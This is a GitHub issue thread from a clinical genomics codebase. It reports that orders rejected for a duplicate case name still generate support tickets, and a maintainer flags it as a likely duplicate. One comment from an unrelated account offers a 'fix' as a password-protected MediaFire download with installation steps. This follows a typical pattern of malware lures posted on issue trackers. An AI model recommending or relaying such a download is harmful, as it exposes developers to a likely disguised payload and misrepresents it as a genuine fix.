### ISSUE TITLE
Bug: Tickets are submitted despite incorrect case names

### ISSUE THREAD

**Issue by karlnyr** [Clinical-Genomics/cg#3642] opened 2024-08-27 07:26 UTC
**Describe the bug**

When a customer orders a case that already exists, but with a different sample, the validation returns a "case already exists". This is correct, as we do not allow customers to change the constellation of a family. The case is not created in statusdb, there is no order created. However, there is a ticket generated from this:

<img width="1513" alt="image" src="https://github.com/user-attachments/assets/cb1fa0ec-9fd7-4836-82c1-02e026f5f891">

The notification from the email above contains information about the order that was placed. This causes a lot of confusion for us in production, making it difficult to see which one we should deliver.

First of all, the customers are unaware that they are spamming us with tickets, because the validation occurs later. I think that part could be fixed when we have a better validation in place, but currently, this is confusing for the customer, and production users.

**To Reproduce**
1. Place an order for an existing case name

**Expected behavior**

No ticket should be generated.

**Comment by islean** [comment] 2024-08-27 07:29
Potential duplicate of https://github.com/Clinical-Genomics/clinical-genomics-ui/issues/450

**Comment by NikhilKumar77777** [comment] 2024-08-27 07:36
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Closed** 2024-08-27 12:57 UTC
Labels: Bug, Gain L, Effort M, Urgency L
